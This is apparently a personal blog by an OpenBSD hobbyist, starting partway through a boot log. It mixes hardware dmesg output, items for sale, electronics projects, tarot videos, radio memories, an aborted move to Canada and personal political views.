mem_layout[1] page 0x0000000000000600 -> 0x00000000000007FF
mem_layout[2] page 0x0000000000000800 -> 0x0000000000002040
mem_layout[3] page 0x0000000000002041 -> 0x0000000000003FFFInitial setup \
done, switching console.
boot_desc->desc_ver:7
boot_desc->desc_size:400
boot_desc->stack_top:0
boot_desc->heap_start:0
boot_desc->heap_end:0
boot_desc->argc:2
boot_desc->flags:0x5
boot_desc->core_mask:0x3
boot_desc->dram_size:512
boot_desc->phy_mem_desc_addr:0
boot_desc->debugger_flag_addr:0xa44
boot_desc->eclock:500000000
boot_desc->boot_info_addr:0x100200
boot_info->ver_major:1
boot_info->ver_minor:2
boot_info->stack_top:0
boot_info->heap_start:0
boot_info->heap_end:0
boot_info->boot_desc_addr:0
boot_info->exception_base_addr:0x1000
boot_info->stack_size:0
boot_info->flags:0x5
boot_info->core_mask:0x3
boot_info->dram_size:512
boot_info->phys_mem_desc_addr:0x24108
boot_info->debugger_flags_addr:0
boot_info->eclock:500000000
boot_info->dclock:266000000
boot_info->board_type:20004
boot_info->board_rev_major:0
boot_info->board_rev_minor:16
boot_info->mac_addr_count:3
boot_info->cf_common_addr:0
boot_info->cf_attr_addr:0
boot_info->led_display_addr:0
boot_info->dfaclock:0
boot_info->config_flags:0x8
[ using 759960 bytes of bsd ELF symbol table ]
Copyright (c) 1982, 1986, 1989, 1991, 1993
The Regents of the University of California. All rights reserved.
Copyright (c) 1995-2023 OpenBSD. All rights reserved. https://www.OpenBSD.org
OpenBSD 7.3 (GENERIC.MP) #1242: Sat Mar 25 18:04:31 MDT 2023
deraadt@octeon.openbsd.org:/usr/src/sys/arch/octeon/compile/GENERIC.MP
real mem = 536870912 (512MB)
avail mem = 521076736 (496MB)
random: good seed from bootblocks
mainbus0 at root: board 20004 rev 0.16, model CN3xxx/CN5xxx
cpu0 at mainbus0: CN50xx CPU rev 0.1 500 MHz, Software FP emulation
cpu0: cache L1-I 32KB 4 way D 16KB 64 way, L2 128KB 8 way
cpu1 at mainbus0: CN50xx CPU rev 0.1 500 MHz, Software FP emulation
cpu1: cache L1-I 32KB 4 way D 16KB 64 way, L2 128KB 8 way
clock0 at mainbus0: int 5
octcrypto0 at mainbus0
iobus0 at mainbus0
simplebus0 at iobus0: "soc"
octciu0 at simplebus0
octsmi0 at simplebus0
octpip0 at simplebus0
octgmx0 at octpip0 interface 0
cnmac0 at octgmx0: port 0 RGMII, address fc:ec:da:04:8d:68
atphy0 at cnmac0 phy 7: AR8035 10/100/1000 PHY, rev. 2
cnmac1 at octgmx0: port 1 RGMII, address fc:ec:da:04:8d:69
atphy1 at cnmac1 phy 6: AR8035 10/100/1000 PHY, rev. 2
cnmac2 at octgmx0: port 2 RGMII, address fc:ec:da:04:8d:6a
atphy2 at cnmac2 phy 5: AR8035 10/100/1000 PHY, rev. 2
com0 at simplebus0: ns16550a, 64 byte fifo
com0: console
dwctwo0 at iobus0 base 0x1180068000000 irq 56
usb0 at dwctwo0: USB revision 2.0
uhub0 at usb0 configuration 1 interface 0 "Octeon DWC2 root hub" rev \
2.00/1.00 addr 1
octrng0 at iobus0 base 0x1400000000000 irq 0
umass0 at uhub0 port 1 configuration 1 interface 0 " UDinfo UF2 4GB" \
rev 2.00/1.00 addr 2
umass0: using SCSI over Bulk-Only
scsibus0 at umass0: 2 targets, initiator 0
sd0 at scsibus0 targ 1 lun 0: <, UDinfo UF2 4GB, PMAP> removable \
serial.13fe420077C9177D2781
sd0: 3824MB, 512 bytes/sector, 7831552 sectors
vscsi0 at root
scsibus1 at vscsi0: 256 targets
softraid0 at root
scsibus2 at softraid0: 256 targets
root on sd0a (278fc32a6dd96ea4.a) swap on sd0b dump on sd0b
WARNING: CHECK AND RESET THE DATE!
Blue is exactly the same as Red except for 2 GB more memory.
The reason I'm parting with them is that they were collecting dust and they
might still have some lifetime (although PC Engines once called EOL for the
APU's in 2022). They are good for test setups is my thinking.
Best Regards,
-peter
In English and German (Deutsch siehe unten):
In the month of May 2023 I'm opening to the sale of my biggest PC.
It is a nine year old Xeon, with 2 TB (WD RED NAS) drive, small SSD,
with keyboard and LG monitor (possibly older than 9 years). It also has
32 GB DDR-3 RAM.
I'm selling this all for 160 EUR, which I think is a great deal even though
this is an old PC. Things you can do with this are keeping the case and
replacing the motherboard for an upgrade (maybe next year?). The case is
great. The age and the powerdraw for this PC really only give it a life of
one to two years. Powerdraw in idle is about 10-30 Watts with monitor possibly
double that.
Here is some photos of the PC when it was new.
Im Monat Mai 2023 verkaufe ich meinen groessten PC. Es ist ein neun Jahre
alter Xeon, mit 2 TB (WD RED NAS), kleinen SSD, mit Tastatur und LG Monitor
(der warscheinlich aelter ist als 9 Jahre). Es hat auch 32 GB DDR-3 RAM
Speicher.
Ich verkaufe alles fuer 160 EUR, was ich denke ist ein super Deal auch wenn
es ein alter PC ist. Dinge die man damit machen kann ist das Gehaeuse behalten
und eine neues Mainboard reintun fuer den upgrade (Vielleicht naechstes Jahr?).
Das Gehaeuse ist super toll dafuer. Das Alter und der Stromverbrauch fuer
diesen PC geben es noch ein Leben von maximal 1-2 Jahren. Stromverbrauch ist
ungefaehr 10-30 Watt und mit Monitor doppelt so viel.
Ich teile ein paar Photos von dem PC als es noch neu war.
Please contact me at computer [at] mainrechner.de. I prefer to sell within
Schweinfurt or Lower Franconia due to the horrendous shipping charges. If you
want it despite, you pay shipping (20-40 Kg).
Bitte kontaktieren Sie mich bei computer [at] mainrechner.de. I bevorzuge
es zu verkaufen in Schweinfurt oder in Unterfranken wegen den Post gebuehren.
Wenn Sie es per Post haben wollen, bezahlen Sie fuer DHL (20-40 Kg).
Der Lehrlauf unter Windows 10 Pro, beträgt 55 Watt. Zombie-Power ist
1-2 Watt aber es existiert ein hardswitch für 0W.
Ich verkaufe damit ein Keyboard (Cherry Schwarz), und ein Monitor ~20 Zoll, der
aber schon recht alt ist. Auch schmeisse ich eine USB Wifi Karte mit rein,
die sowohl 2.4 GHz so wie 5 GHz kann. Da diese karte in Ottawa, Kanada gekauft
wurde koennte es sein das Kanal 12 und 13 auf dem 2.4 GHz Band nicht
funktionieren.
Ich kann mir denken das der Computer ein guten Gaming Computer macht. Dafür benötigt er eine Gaming GPU karte die wohl passen wird aber es bräuchte
vieleicht einen grössere Stromadapter (1000 W vielleicht?). In dem
gleichen Sinne ist es fuer ML/KI bestimmt tauglich braucht aber grösseren
Stromadapter. Es kann bis zu vier PCI-e 16x GPU karten nehmen, es scheint da
währe platz dazu. Hierfür ist der RAM mit 32 GB gut, aber da es
DDR-3 RAM ist vielleicht etwas langsam? Ich habe keine erfahrung mit KI, kann
mir aber denken das alles schnell gehen muss.
Ich verkaufe den PC für 160 EUR. Kontaktieren Sie mich bei
computer@mainrechner.de. Vielen Dank! Mehr bilder von dem Xeon PC.
Auch verkaufe ich einen 48 Zoll Samsung 4K Smart Fernseher im Monat Oktober 2023
auch für 160 EUR.
Für Nostalgiker verkaufe ich auch einen Mac G5 fuer 800 EUR. Das heisst
in anderen worten Sie müssen mir viel bezahlen/mich überreden das ich
das Ding verkaufe. Obwohl es um die 100W im lehrlauf schluckt und weniger
taugt als ein Raspberry Pi. Warscheinlich nur was wert für Sammler.
A rare unencrypted blog article. I have hung up glass prisms where the panel
once was. It gives a pretty awesome light in my livingroom. I know I'm
enjoying it.
Upside down worlds, but I hope the plant survives the stress
For the first time in 27 years I did soldering work. The result is newbyish
but good for a start. I didn't practice it and my hand was shaking somewhat.
First, the raspberry pi 1W, I started with this one:
As you can see I added headers to these boards. The Mango Pi I kept in the
case and found it to be resistant to heat, which was good. Both boards
functioned after this.
IPv6
October 8th, 2023
You're on IPv6 if you see this, currently also on another computer as I
do a migration. Tomorrow or so everything should be migrated.
Turning on the heat, on saturday oct. 14th for 2023/2024
I played a bit with lighting effects and colour here. I hope it's ok.
These are Maple trees that grow next to me.
Things for sale (november)
October 28th, 2023
I'm selling off a few things:
A HPE OfficeConnect 1850 JL169A 8x 10 gbit LAN switch, I bought this in
May 2018 and hardly used it because it is too loud for my apartment. New
value was 850 EUR or so, in 2018. Asking 450 EUR or best offer.
A G5 Power Macintosh dmesg here. I bought this used for 175 EUR in 2019 and added a lot of
things to it, such as 80 GB Intel SSD, 2 USB Cards (including USB 3) and a 4
port ethernet card (Intel). I'm asking 230 EUR or best offer. I have a version
of mac os x panther with it, and of course it runs OpenBSD/macppc.
I have two TP-LINK WR-1043NDv4 access points that I'd sell for 20 EUR for
the pair. They support OpenWRT and in the past were used for Freifunk Franken.
Happy Hallowe'en 2023
October 31st, 2023
It was in the early 1700's in Ireland
A shadow pulled across the land in autumn
And then someone lit a lantern
To guide the children home...
In the 21st century this shadow ghost
was spotted in Germany
And then someone lit a lantern
To guide the children home
Remembering CKLN, it would be nice to have it BACK!
December 17th, 2023
You know I lately have been reminded by memories that CKLN 88.1 in Toronto,
was so dope, take a toke but don't choke...
It would be nice to reinstitute it for the global village. Community radio
at its finest. With all the same people who ran it in 2011 and before.
Mastermind - DJ X and Gemini
Mixtape Massacre - (forgot your names)
Reggae Mania - DJ Ron Nelson and Lisa
That Punk Rock show with Ron Anizych (4:11 on the cheeba, 4:20AM smoke break).
Soca Vibes (Curacao) - forgot the DJ's name but it was cool!
Renegade Radio with Rightous McLeod
That other Native Voice with Audrey Redmond...something?
Saturday Morning Live with Norman Otis Richmond
Reggae (something) with Mercedes!
(That show starting off with James Keelaghan 'My Skies' after reggae).
Overnight shows playing Nina Hagen among others in German singing Seemann a
cover or original of Rammstein.
Liferattle (a radio show much liked by me) sorry I forgot the DJ.
Lots of memories for that African show (I met the DJ but forgot his name).
The two dudes who were before Norman Richmond's show doing a talk show, they
were for a bit associated with Ron Anizych (BTW hi AK and rubber phone guy).
There is too many to mention. I'd love to see these people doing it again, or
someone really close to them taking the torch.
yeah, good memories. Lots of fun I had from 1993 to 2011 listening in for
7+11 years (if you are hard at math that's 18 years). Cool. Merry Christmas
to all, Bon Noel, and Happy New Years 2024. From the Internet Prison, yours
-peter
I don't mind Ukraine joining the EU...eventually. However. Right now it's
ruled by a dictator who needs to call for new democratic elections. Until
that point in time, no EU annex.
Merry Christmas and Happy New Year
December 25th, 2023
Merry Christmas and Happy New Year to the Princess Pats Regiment 721 at
CFB Petawawa. I adore you guys, why haven't you replied to my inquiry
yet? Here is a wake up
call, BTW I'm changing my phone number soon.
We've entered a new phase
January 2nd, 2024
I'll be travelling to Berlin next week. I'm visiting landmarks such as
Embassies, Reichstag (german parliament), Checkpoint Charlie, and perhaps
an old aquaintance. I am interested in the democratic process of Germany
and thus will be attending a parliamentary debate or two. All in all I'm
spending nearly five days in the city I was born.
I'll be travelling to North America in March. There is some legal things I
need to clear up. I'd also like to visit old comrades and volunteer work
at perhaps a homeless shelter or two. It's not really working if they provide
a lunch. Lunch is not a currency. I'm spending perhaps three weeks in .ca.
Please don't expect any postings in the late march nor in early april.
A rare unencrypted blog entry. I'm testing the water on a new host.
Question. With decompilers that are AI assisted why do we still need open
source? Everything is open source now since we can decompile it!
I'm going to be examining possibilities for creating such a decompiler which
is a second stage to the GNU objdump. Or any disassembler. It's important
that Linux which started as Open Source and is protected by the GPL, cannot
get away with disappointing and saddening geeks and nerds who worked hard
for this. Don't be saddened by non-source distros, because soon we'll be
able to decompile it all back to C. Examine the licenses of Windows closely
and see if these are "reversable", I know for one that the ftp program in
Windows can be reversed because it came from BSD (with such license). Same
as sshd etc etc.
I'm donating my tech books to a local computing association
I don't have anyone special to say to them that I'd like to be their Valentine,
maybe next year. Though the practice of Valentines day was most evident around
highschool time when a pretty young woman kept giving me a gift. And I took
her friendship and never considered more. I should have though, oh well :-).
Today is my birthday. For the past two years I've been watching Tarot with
pleasure. I've learned a little by watching this. Last year my uncle gave
me a used set of Tarot cards, and for my birthday I got another deck from my
parents. Here is my question to the spirit on "what did I not see in the past".
It basically was an iteration of what I already know, however there is more
things that I did not see before "entrapment, judicials, the devil is the
plaintiff, deep sleep, cleric involvement such as religious leaders". This
was chosen by spirit to be the years 2001 and 2002. Enjoy taking a peak into
my past if Tarot is to your liking.
BTW, it started with 9/11, however it really took on a new dimension on October
16th, when the Moon, Venus, Mercury and Sun were all in Leo (astrologically)
and in Virgo (astronomically). O16 demo was a shift. With a bit of research
I realised that October 16th in Canada is actually the anniversary of the
"October crisis" of 1968(?) where Pierre Trudeau (father of present PM) called
out the "War Measures Act". Had I put these dates into my history lessons of
ol' I may have stayed away against the Anti-Harris demo of October 16th 2001 in
the city of Toronto. I was already told by someone in April of 2002 when I
found myself in the emergency room of a hospital and later in ward 5, that
it was all set up. Shout outs to Stan Lee, for being an inspiration. I hope
he's still alive today.
Furthermore I want to tell you about my dream. I was at a school house and
there was this barrier.. a very large monolith rock wall. I removed it and
it exposed a street behind it. The street in my dream was called
"Hanoi street". Thinking a bit of the Orient? And then I walked to certain
schools and left my dirty laundry around there which I accidentally dropped.
actually I did it 3 days ago, and it's hot now, but it's supposed to get cold
again and I'm hoping it'll be alright. Summer is here until October!
Eclipse Tarot readings (two)
April 8th, 2024
I have done two readings, one was a lengthy one where I just started recording
at some point in time, and it evolved. I had to cut out parts of it. Eclipse reading #1.
The second one is for Kitt from S5, I don't remember her last name which is
perhaps good. If you're seeing this Kitt, it's a tip off to you: Eclipse reading #2 (peak).
I'm a psychic now dunchaknow?!
One of many new projects
April 9th, 2024
This is Altair (the eagle), a raspberry pi zero 2W (now with H, bad soldering)
that I'll be using to control power to several devices in my 9U cabinet.
I have another RPI 4b-sized board planned that distributes power (10 A at
5V) to seven 1.5A USB-A outputs. An eighths is also going in there seperately
but I don't think I'll use it much. Basically the distributer module will
be able to send the 5V DC to the Waveshare Relay board (pictured) where it
will be able to be pulled via relay and reset. This is a power management
unit. I still have to find a power supply that has around 60W. I have one
which is apple, but I'm unsure whether I should use that. Expect this project
to be finished by end of May unless something stalls me.
Here is Altair's dmesg:
OpenBSD 7.5 (GENERIC.MP) #138: Wed Mar 20 19:42:15 MDT 2024
deraadt@arm64.openbsd.org:/usr/src/sys/arch/arm64/compile/GENERIC.MP
real mem = 446599168 (425MB)
avail mem = 394485760 (376MB)
random: good seed from bootblocks
mainbus0 at root: Raspberry Pi Zero 2 Rev 1.0
efi0 at mainbus0: UEFI 2.8
efi0: Das U-Boot rev 0x20211000
smbios0 at efi0: SMBIOS 3.0
smbios0: vendor U-Boot version "2021.10" date 10/01/2021
smbios0: Unknown Unknown Product
cpu0 at mainbus0 mpidr 0: ARM Cortex-A53 r0p4
cpu0: 32KB 64b/line 2-way L1 VIPT I-cache, 32KB 64b/line 4-way L1 D-cache
cpu0: 512KB 64b/line 16-way L2 cache
cpu0: CRC32,ASID16
cpu1 at mainbus0 mpidr 1: ARM Cortex-A53 r0p4
cpu1: 32KB 64b/line 2-way L1 VIPT I-cache, 32KB 64b/line 4-way L1 D-cache
cpu1: 512KB 64b/line 16-way L2 cache
cpu2 at mainbus0 mpidr 2: ARM Cortex-A53 r0p4
cpu2: 32KB 64b/line 2-way L1 VIPT I-cache, 32KB 64b/line 4-way L1 D-cache
cpu2: 512KB 64b/line 16-way L2 cache
cpu3 at mainbus0 mpidr 3: ARM Cortex-A53 r0p4
cpu3: 32KB 64b/line 2-way L1 VIPT I-cache, 32KB 64b/line 4-way L1 D-cache
cpu3: 512KB 64b/line 16-way L2 cache
"linux,cma" at mainbus0 not configured
apm0 at mainbus0
simplefb0 at mainbus0: 656x416, 32bpp
wsdisplay0 at simplefb0 mux 1
wsdisplay0: screen 0-5 added (std, vt100 emulation)
"system" at mainbus0 not configured
"axi" at mainbus0 not configured
simplebus0 at mainbus0: "soc"
bcmclock0 at simplebus0
bcmmbox0 at simplebus0
bcmgpio0 at simplebus0
bcmaux0 at simplebus0
bcmdmac0 at simplebus0: DMA0 DMA2 DMA4 DMA5 DMA8 DMA9 DMA10 DMA11
bcmintc0 at simplebus0
pluart0 at simplebus0: rev 2, 16 byte fifo
pluart0: console
bcmsdhost0 at simplebus0: 250 MHz base clock
sdmmc0 at bcmsdhost0: 4-bit, sd high-speed, mmc high-speed, dma
dwctwo0 at simplebus0
bcmdog0 at simplebus0
bcmrng0 at simplebus0
bcmtemp0 at simplebus0
"local_intc" at simplebus0 not configured
sdhc0 at simplebus0
sdhc0: SDHC 3.00, 200 MHz base clock
sdmmc1 at sdhc0: 4-bit, sd high-speed, mmc high-speed
"firmware" at simplebus0 not configured
"power" at simplebus0 not configured
"mailbox" at simplebus0 not configured
"gpiomem" at simplebus0 not configured
"fb" at simplebus0 not configured
"nvmem_otp" at simplebus0 not configured
"nvmem_cust" at simplebus0 not configured
"clocks" at mainbus0 not configured
"phy" at mainbus0 not configured
"arm-pmu" at mainbus0 not configured
agtimer0 at mainbus0: 19200 kHz
"cam1_regulator" at mainbus0 not configured
"cam_dummy_reg" at mainbus0 not configured
"fixedregulator_3v3" at mainbus0 not configured
"fixedregulator_5v0" at mainbus0 not configured
gpioleds0 at mainbus0: "ACT"
usb0 at dwctwo0: USB revision 2.0
uhub0 at usb0 configuration 1 interface 0 "Broadcom DWC2 root hub" rev 2.00/1.00 addr 1
scsibus0 at sdmmc0: 2 targets, initiator 0
sd0 at scsibus0 targ 1 lun 0: removable
sd0: 30436MB, 512 bytes/sector, 62333952 sectors
bwfm0 at sdmmc1 function 1
manufacturer 0x02d0, product 0xa9a6 at sdmmc1 function 2 not configured
vscsi0 at root
scsibus1 at vscsi0: 256 targets
softraid0 at root
scsibus2 at softraid0: 256 targets
root on sd0a (8812d0303dee65c6.a) swap on sd0b dump on sd0b
WARNING: / was not properly unmounted
WARNING: CHECK AND RESET THE DATE!
gpio0 at bcmgpio0: 54 pins
"bootloader" at mainbus0 not configured
bwfm0: address d8:3a:dd:7a:5c:90
There is some confusion whether I meant Kitt or Kitty. Kitt is a female where
Kitty is a male. Both may by now live in or around Minnesota. Kitty is gonna
find his soulmate soon. Good going! Beware of lust (jezebel spirits) in
around October.
The blog had some downtime (three days). Thanks to Stacy for noticing and
telling me. It had to do with OpenBSD pinsyscalls() which needed recompilation
of the CGI's. Furthermore I've been heavily working on a sip proxy for home
and taking a breather now, since I'm stuck on something. Time to pull back
some other projects perhaps. it's another 2 weeks until May when I'll be
starting on the edwin project.
I'm returning to my apartment later today. I made use of my parents heat for
the last two days. Now I'll have to turn the heat back on for next week.
In german there is a saying "April, der macht was er will!", which translates
to "April does what it feels like!", almost weird isn't it?
You get to see it from 2 perspectives, maybe I'll work on a third as well, give
me some time for that.
The AVI is a little big, I'm compressing it to VC9 but it'll take most of the
night (I only have slow computers on). But check for it...
recompressed camera from behind me.
Reflections are fun! It may be a look into the future or the past. Look for
the dangers of this "evil flow" called corruption. The snares of corruption
get the best. I personally have found this on myself and I had to be turned
away from the power that I wielded. It did me good. But I still have root
(I think, hopefully just on my own computers).
The cryptograms have been broken in around ~17 seconds, new cipher coming up?
Hi, just a heads up the videos are unavailable because they are being served
from home and the tunnel is down. I'll be returning shortly in 2 hours to
hopefully get it all started again. Look on the bright side, all the other
cloud hosts have been upgraded yesterday. I wonder what the problem is this
time. I see that there is no IPSEC/IKED exchange..
Another Tarot while my Internet was up/down/up/down
April 30th, 2024
Latest with rants Last reuploaded to another host
I'm really sorry for not being able to deliver these reliably. My ISP has
degraded my link to about 40/40 Mbit down/up. Odd. So enjoy. Happy 1st
of May tomorrow!
More Tarot while the Internet is down
May 1st, 2024
I was told it's regional/city wide. I'm still going for a refund (pfand).
My Internet was down the earlier part of the day, so I made a roughly 1 hour
reading. Please fast forward about 20 min if you don't want to see me eat, or
for good company time it so you eat with me, I was eating lunch.
session XXII
I'm mostly studying the Tarot book here and gaining valuable lessons.
Longer reading what is moving the governments, the people, the future, now,
and my life. Just ask the cards. Tomorrow is a holiday in Bavaria btw,
shops are closed.
It was a quiet day. Here is my reading.
sessionXXVI enjoy!
Vendredi/Friday Tarot
May 20th, 2024
I recorded this on friday. Yesterday I upgraded this webserver and the
varnishd didn't come up which I didn't notice, so you couldn't even guess
the sessions names. Here it is now.
I've switched to the arabic numbering system because I don't remember the
roman numeral for 50. If there is any.
Here's a question for you, geographical trivia
May 24th, 2024
Is the midday sun (high noon) in the north down under? hoi! I personally
think, yes it is! So when you come from the blue mountains you're actually
from the south not from the north!
Similarily the Kiwis, on the south island have the NZ alps in the north, not
the south. So you see the mountains cast shadows to the south.
I was playing around with lotion yesterday before sleep, and decided to make
a photo. Think of digging your long fingernailed hands into this! Think of
it as whip cream! And it is just about strawberry season! And soon the
cherries are ripe!
I want to get away from calling my card-laying "Tarot"
June 9th, 2024
It's a new week and I started early. After voting at the EU polls I made
this one.
session 57
Session 58-60, Administrivia
June 11th, 2024
Here is the mornings and afternoons of the past few days. There was another
one that was lengthy but I decided not to "air" it. I hope you understand.
It's not censorship, but it is protecting me, and others from harm.
session 58session 59session 60
Also I'm in the process of purchasing more disk space from my cloud provider
for storing these tarot pieces. The reason is two fold. I'm moving, and will
not retain the internet link I have to home starting in 2 months or so. Since
all my tarot is tunneled to home when you download with a proxy cache inbetween
I've been able to avoid extra space for now. We'll see I'm thinking of getting
100 GB or so and also use it for backup purposes, we'll see if I can afford
it. Enjoy the sessions! pjp.
Mercurial! Wednesday morning card laying
June 12th, 2024
session 61
BTW the maintenance went well. The entire videos are all on the cloud computer
now.
Mercredi numero deux
June 12th, 2024
Et, je mange mon troisieme petit dejeuner c'est heure ici.
session 62
Who has three brexits in one morning round? Onlyyyyyyy Peeeeter!
Hanging out with Pete
June 13th, 2024
The life of a loner, here is an insight what I watch on my youtube.
session 63
Have a great weekend. I'll be back sunday or monday.
session 68
Administrivia: switching to Youtube
June 15th, 2024
I'm in the process uploading my videos on "card laying" to Youtube to get
greater exposure. In the process, I'll eventually remove the content from
this blog. This is a win-win since Youtube censors Copyright infringements
which is not intended, even here. The AI being used by youtube/google is
very good at identifying copyrighted material and offers alternative music
to replace the music, even if it's just in the background. The second
advantage is that the voice recognition AI of google is fairly good. This
makes my videos available for those with disabilities, and someone can get
a transcript. Even though my voice isn't always 100% coherent it seems to
recognize it very well. So far I've uploaded 3 videos. It takes its time
because Youtube scans the background music for copyright. and then I have
to manually select songs to cover infringement.
There is 4 weeks left before I move to Canada so not much time for new
content. Don't expect much content from North America until I'm settled,
and have things such as housing, and income. For those interested I'm
intending to move to the Ottawa/Kanata area, which I've visited a handful
times in my life.
My Youtube channel is called "the life of pbug" and has goldflipper art that
I created on OpenBSD with a Wacom tablet. The link to this channel is
here (the life of pbug).
Happy Solstice!
June 20th, 2024
Solstice is upon us again. Enjoy!
Thinking around the term "Child of God"
June 23rd, 2024
Have you ever though heavily around the term "Child of God"? A COG, as in
a pre-cognitive a term that was popularized by the movie Minority Report with
Tom Cruise. In that movie the cog's were used as the three pre-cognitives by
police to bust people of pre-crime, based on their psychic report of a murder
taking place. It was all fine and all until the protagonist acted out by
Tom Cruise was reported on a murder himself, which sparked the plot of this
movie.
I personally thought the best part of the movie was the ending where
Agatha and the Bone Twins were reading books and living normal life on a
far away island perhaps in the northern Wisconsins regions of Lake Michigan.
COG's should be free! Best quotes from the movie were "Oh Howard don't cry!",
"Oh god! Don't put that thing on me!". If you haven't watched it, it's worth
watching.
Undeadly, you too were my addiction
June 24th, 2024
I've been reading undeadly.org for more than two decades, and if it didn't
exist that long it was deadly.org. Either way. I'm going to say this on
recent events. People trolled. And then somehow deleted their comments
leaving weird posts which were in reply of. To have this deleted without
a trace. It's maddening, it's sick. All I require of you is to edit your
software to insert "there was a comment here it was deleted". Otherwise
everyone is no wiser and it looks bad. From this ordeal I learned something.
I was addicted, in fact whenever I went to undeadly a few years ago I said to
myself "slashdot" which is what I would visit right after. I haven't seen
slashdot in a number of years.. I cut it off before I cut off heise.de and
golem.de. So now, I'm sorry to say I'm cutting off undeadly.org. It was fun
but I must go on. I have enough knowledge to get news via comments in the
github to understand what's going on. So I'm deleting undeadly from my
bookmarks and will break the mental chain that connected undeadly to my daily
addiction habit. Thanks! I've been cutting so much I don't know what's next
will it be OpenBSD and then Computers completely? Time will tell.
Bon fete Canada a proche demaines
June 30th, 2024
J'ecrit ici en francais, mais mon francais n'est pas fluent. Ici mon
vocabulaire et je n'utiliser pas mon livre dictionaire des la rousse anglais
francais. Le langue traditione du Canada c'est francais et anglais. C'est
le langue officielle avec le monde. Mais Canada utilise cent plus langues
a interne pour les canadien. C'est la langue multi culturelle. Ici les
langues du Canadienne Indienne, ici la langue du monde aussi. Aujourdhui
il pleut en Allemande et je preparez a returne a Canada en trois semaine.
C'est une voyage tres difficile pour moi et mon destination c'est la
Outtaouis (Ottawa). Les proche demains c'est une jour important. Je sez
pour Canada, "Bon fete Canada!" et le jour du Canada c'est lundi en demaine.
C'est une Weekend magnifique, tres grande! A bientot!
Goodbye Europe, my last week here
July 14th, 2024
Through thick and thin, I called Europe my home for 22 years. Even though
I never got much employment, I was able to make use of the social assistance
program for well over a decade in total. I'm going where there is more
opportunity in terms of getting work, Canada. Canada was so nice as to
giving me remote work via the Internet for nearly a decade and put money into
my hands, so that I could persue some hobbies at least. I tried to share
as much as possible, not by physical contact but rather by means of the
Internet.
This is my last week here in Europe if everything goes as planned. Even
though I'm heading into new-old waters (because I lived in Canada 15 years
some time prior), it probably won't affect me until spring time. European
spring is splendid, a gift of nature. However Canadian Autumn and Winters
are unmatched, I'm looking forward to seeing real dumps of snow and the
particular area where I'm going I'm going to experience the yellow, red, and
orange and brown colours of the maple trees in the Ottawa Valley for Indian
summer.
Had it not been for the European Internet which I call "PsychNet" with a
tongue in cheek, I probably would have never found my like and passion for
tarot card reading, meeting virtually with nice english speaking and mostly
female psychics and tarot layers. I go to Canada with a few decks of Tarot
which are german and hope to make good practice of it. I have a YouTube
channel which is now dormant until I'm able to get it going in Canada. It
is called "The life of pbug" and it's not just Tarot but rather I tagged it
as "mental health", I use a series of topics here.
So in that regard it doesn't really matter where I live. I am a Netizen of
the World and I'm especially glad that things worked out the way they did.
So in a few days I'm on a plane to Canada, I'm going to a place I haven't
called home for 22 years and such it will take a bit of getting used to
again. I'm looking forward to comparing (and documenting) differences of
the Canadian mental health system and the European system. I had a small
introduction once in Canada to this, but not with the set of illnesses that
I was given in Europe. So..see you on the Internet! I'm only an email
away.
Finally I would like to give THE message that I was taught in college in
Canada. "Communication is KEY".
I'm not entering Canada
July 19th, 2024
There is a few reasons for this. One minor factor may have been that there was
a global microsoft outtage. A major factor was that the Air Canada checkin
didn't allow me to check in my luggage because I had an invalid Immigration
document. My status is PR (permanent resident) in Canada. My PR card that
I obtained in 2002 was stolen. I told the Air Canada representative this and
they wouldn't let me on the flight. I then executed my plan, which failed.
I pulled out my Canada flag which is about 4x6 feet in size and gave it to
her. In my haste I kinda threw it at her. She didn't accept it. I asked her
to take it on board of the plane to the country where it belongs. She coulda
had it for herself even. No such luck she didn't want it. I told her it's
worth a 100 million dollars CAD, she still didn't want it. Really Canada is
priceless, but I'm not returning there. Sorry. I'm fed up with this system
that makes people "disappear" whether fighting them with deaththreats, or in my
case poisoning me, in front of Canada's parliament literally it was 300 meters
away from Byward Market in Ottawa, and strands them in 3rd
countries. So you will have to extradite me, if you really think I'm worth it. My new sights is elsewhere in the world. Maple dreams have come to pass.
I told god previously that this was the only way for H.I.M. to stop me with
divine intervention. I guess god has a bigger plan for me. Sorry, it would
have been nice to see my 2nd home again, but now I'm really stranded, broke
and hurting (due to carrying so much luggage around). Guess I'll have to
apply to welfare again and plan a different exit.
Ouverte la porte mon dieu Pierot. Oubliez, je n'est ouverte la porte pour vous.
(claire de la lune)
One more day before...
July 20th, 2024
It's been a thought of mine for a while. Maybe it was a manifestation, or
maybe not. I saw signs that on July 21st, Germany will be invaded by Russia.
We'll see if that happens or not. But.. the 21st is not a business day! It
must be on the 22nd! Sure... call up Putin to protest!
Three signs why I did not leave ".de"
July 22nd, 2024
Getting up the morning of the 19th, the Microsoft IT failure was in full
effect. Isn't it time for alternatives than Microsoft-only global networks?
Exchanging money at the Frankfurt airport, I was going to get ripped off
with Canada dollars, because of the aforementioned failure the person had to
do some manual calculation because the "system was down". I would have been
betrayed by $200 CAD had I not said "no thanks". That person was canadian
with a german background (1's and 9's were canadian, 7's were german), thanks
smiley!
Air Canada rep did not grant me boarding rights due to an expired Visa,
this is "going by the books" and I knew this. I was just testing the waters
whether Canada would have said "go ahead". I gave her the scenario that my
PR card was stolen (which it really was). The TPR (travel document) I did not
purchase because it puts money in the hands of the thiefs that stole my PR
card in the beginning. It again is a rip-off.
So the show must go on. Sorry. I'm getting sick of this.
As an outsider I noticed that "Germany" doesn't even know that there is another
candidate in the USA elections. I'm gonna list my pros and cons about what
I see about the candidate Jill Stein.
pros:
Promise of new jobs (new economy) with green means
Healthcare for all Americans
Affordable Housing for Americans
Minimum wage of at least $25 per hour
Abandonment of nuclear power
Dismantling of the Military Industrial Complex. Something previous
presidents warned about.
cons:
The dismantling of the MIC (see above) will prove to be hard. A lot of
cozy jobs are depended on this, so you Jill, must, provide jobs that are cozy
as an alternative.
I'm worried about people "disappearing" forever in the mental health system
because it is free. When people get released because of non-payment issues it
is sometimes a blessing. This free mental health system needs to be debated
and compromised about.
She is trying to criminalise violent behaviour. Where do you draw the
line on this? Aggressiveness is body language. It is a release to some. I
understand while domestic violence is bad, those that want an aggressive system
should have a buddy that they can body slam around and stuff. And not go to
mental wards for it.
So while I mostly believe Jill Stein is "THE" candidate for the USA. I'm
looking at this from an outside view that despises that 2-party system. It is
my personal opinion that donkeys and elephants are playing each other out to
get votes. And the American public is fooled over and over. Anyhow. Vote
with your heart and brain. If you are sick of the same ol' at least consider
Jill Stein and debate with your friends over a beer (or tea).
Jill Stein 2024 candidate web site
Let's save the fish in the Main river!
July 31st, 2024
The Main river is 300 odd kilometers long. You can look it up on wikipedia.
